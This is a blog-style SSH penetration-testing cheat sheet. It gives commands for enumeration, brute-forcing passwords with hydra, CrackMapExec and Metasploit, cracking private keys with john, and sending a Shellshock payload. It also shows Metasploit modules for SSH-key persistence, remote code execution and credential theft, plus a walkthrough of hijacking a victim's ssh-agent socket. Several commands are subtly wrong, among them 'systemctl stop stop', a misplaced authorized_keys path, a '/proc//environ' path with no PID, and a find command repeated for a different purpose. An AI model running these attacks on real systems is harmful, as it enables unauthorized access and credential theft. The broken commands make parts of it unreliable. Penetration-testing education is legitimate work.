CyberSecurity,  DevSecOps,  Network

SSH Penetration Testing 

January 18, 2024 / 0 Comments

SSH, which stands for Secure Shell, is a cryptographic network protocol used for secure communication over an unsecured network. It provides a secure way to access and manage remote devices or systems over a potentially insecure network, such as the internet.

SSH allows users to log into and execute commands on a remote machine securely. It uses a client-server model, where the SSH server runs on the remote machine, and the SSH client is used by the user to connect to the server. The communication between the client and the server is encrypted, providing confidentiality and integrity of the data exchanged.

Some common use cases for SSH include:

  1. Remote Command Execution: Users can log in to a remote server and execute commands as if they were physically present at the machine.
  2. File Transfer: SSH includes tools like SCP (Secure Copy) and SFTP (Secure File Transfer Protocol) for secure file transfer between a local and a remote machine.
  3. Tunneling and Port Forwarding: SSH can be used to create secure tunnels for forwarding ports, allowing secure access to services that might otherwise be insecure over the network.
  4. Remote Administration: System administrators often use SSH to manage servers and networking devices remotely.

SSH operates on port 22 by default, but it can be configured to use a different port if needed. It is widely used in the IT industry and plays a crucial role in securing remote access to servers and other devices.

Managing SSH Service

Verify SSH Server Status

systemctl status ssh

Start SSH Service

systemctl start ssh

Stop SSH Service

systemctl stop stop

Restart SSH Service

systemctl restart stop

Define SSH server to start on boot

systemctl enable ssh

When performing SSH penetration testing, several interesting files may contain sensitive information and can be targeted by an attacker.

Client Config

SSH client configuration file can be used to automate configurations or jump between machines, take some time and check the file:

vi /etc/ssh/ssh_config

Server Config

This file contains the configuration settings for the SSH daemon, which can be targeted for configuration-based attacks.

vi /etc/ssh/sshd_config

Recommendation: Active tunnel settings and agent relay, help you with lateral movement.

Authorized Keys

This file contains the public keys that are authorized to access a user’s account, which can be targeted by an attacker to gain unauthorized access.

vi /etc/ssh/authorized_keys

Known Hosts

cat /home/rfs/.ssh/known_hosts

RSA Keys

Default folder containing

cd ~/.ssh
cd /home/rfs/.ssh

SSH Authentication Types

SSH supports several authentication methods to verify the identity of users attempting to connect to a server. The authentication methods are used to ensure that only authorized users can access the system. Here are some common SSH authentication types:

  1. Password Authentication:
  • Users provide a password to authenticate themselves during the login process.
  • While simple, it’s generally considered less secure than other methods, especially if strong, complex passwords are not enforced.
  1. Public Key Authentication:
  • Users generate a pair of cryptographic keys: a public key and a private key.
  • The public key is placed on the server, while the private key remains on the user’s local machine.
  • During authentication, the private key is used to sign a challenge, and the server verifies it with the stored public key.
  • This method is often considered more secure than password authentication and is widely used.
  1. Keyboard-Interactive Authentication:
  • It allows for more interactive authentication methods, such as one-time passwords, biometrics, or other types of challenges.
  • It can be used for multi-factor authentication, making it more secure than simple password authentication.
  1. Host-Based Authentication:
  • Authentication is based on the client host’s identity rather than the user’s.
  • This method is less common and has some security concerns, so it is often not recommended for general use.
  1. Certificate-Based Authentication:
  • Similar to public key authentication but involves the use of X.509 certificates.
  • Certificates are signed by a trusted certificate authority (CA) or self-signed, and the server verifies the client’s certificate during the authentication process.
  • Provides a way to manage and revoke access centrally.
  1. GSSAPI (Generic Security Services Application Programming Interface) Authentication:
  • Integrates with external security services such as Kerberos for user authentication.
  • Requires additional setup but can be useful in environments where centralized authentication services are used.

The choice of authentication method depends on security requirements, user convenience, and the specific use case. Public key authentication, especially with passphrase-protected private keys, is commonly recommended for its balance between security and usability.

SSH Hacking Tools

Tool
nmap
ssh-audit
CrackMapExec
john
thc-hydra
metasploit
SSH-KeyGrab

1. SSH Enumeration

After we scan a network and identify port 22 open on a remote host we need to identify what SSH service is running and what version, we can use Nmap.

nmap -sV -p22 192.168.1.96

SSH Banner Grabber

Banner grabbing is an easy technique to do but can help us a lot, we can verify what service version is running on the remote server and try to find a CVE related to it.

Banner grabbing can be useful for several reasons, including:

  1. Identifying the version and type of SSH server: This information can be used to determine if the SSH server is vulnerable to known exploits or if there are any known security issues with the version of the software being used.
  2. Checking for compliance with organizational security policies: Administrators may want to ensure that all SSH servers in their organization are configured to display a standard banner message that includes specific information.
  3. Verifying the authenticity of an SSH server: Banner messages can be used to verify that the SSH server being accessed is the intended one, rather than a fake or rogue server.

Several tools can be used for SSH banner grabbing, such as Nmap, Netcat, and SSH-Banner. These tools connect to an SSH server and retrieve the banner message. The retrieved banner can then be analyzed to determine the information that is being displayed.

nc 192.168.1.96 22

If we try to connect using the verbose parameter we can check all the information necessary to authenticate on the remote server.

ssh -v 192.168.1.96

Detect SSH Authentication Type

To detect the SSH authentication type being used to access a system, you can examine the system logs. The authentication type will be logged when a user authenticates to the system via SSH.

Here’s how you can check the SSH authentication type on a Linux system:

  1. Open the system log file at /var/log/auth.log using your preferred text editor.
  2. Search for the line that contains the user login information you want to check.
  3. Look for the “Accepted” keyword in the line, which indicates that the authentication was successful.
ssh -v 192.168.1.96

Detect remote users

msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers

2. SSH Exploitation (Port 22 Vulnerabilities)

At this point, we only know what service is running on port 22 and what version it has (OpenSSH_4.7p1 Debian-8ubuntu1), assuming we have found the username msfadmin we will try to brute-force his password using hydra.

Bruteforce SSH Service

hydra -l msfadmin -P rockyou.txt ssh://192.168.1.96
crackmapexec ssh -U user -P passwd.lst 192.168.1.96
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.96
set user_file user.txt
set pass_file password.txt
run

Crack SSH Private Keys

ssh2john id_rsa.priv hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py

Default Credentials

https://github.com/PopLabSec/SSH-default-Credentials

SSH Bad Keys

Some embedded devices have static SSH keys, you can find a collection of keys here:

https://github.com/poplabdev/ssh-badkeys

SSH Exploits

VersionExploit
OpenSSH <7.4
LibSSH RCECVE-2018-10933

SSH Exploits list

SSH and ShellShock

LC_X='() { :; }; echo vulnerable' ssh rfs@poplabsec.com -o SendEnv=LC_X

3. SSH Post Exploitation – Pentest SSH

Persistence

use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) >exploit

SSH User Code Execution

msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) >set rhosts 192.168.1.103
msf exploit(sshexec) >set username rfs
msf exploit(sshexec) >set password poplabsec
msf exploit(sshexec) >set srvhost 192.168.1.107
msf exploit(sshexec) >exploit

Lateral Movement

Read more about Pivoting using SSH

Steal SSH credentials

If we have a meterpreter shell we can use the post-exploitation module post/multi/gather/ssh_creds and try to collect all SSH credentials on the machine.

use post/multi/gather/ssh_creds
msf post(ssh_creds) > set session 1
msf post(ssh_creds) > exploit

Search SSH Key files

find / -name *id_rsa* 2>/dev/null

Search SSH Key files inside file content

find / -name *id_rsa* 2>/dev/null

SSH Hijacking

Find the SSHd process

ps uax|grep sshd
# Attacker looks for the SSH_AUTH_SOCK on victim's environment variables
grep SSH_AUTH_SOCK /proc//environ

Attacker hijack’s victim’s ssh-agent socket

SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l

An attacker can log in to remote systems as the victim

ssh 192.168.1.107 -l victim

You May Also Like

MAC Flooding: Understanding the Attack

January 30, 2024

Beyond the Hype: Understanding the Limitations of Quantum Computing

August 15, 2024

Cloud Security Principles and Why I Need It.

September 25, 2023

Leave a Reply

Your email address will not be published. Required fields are marked *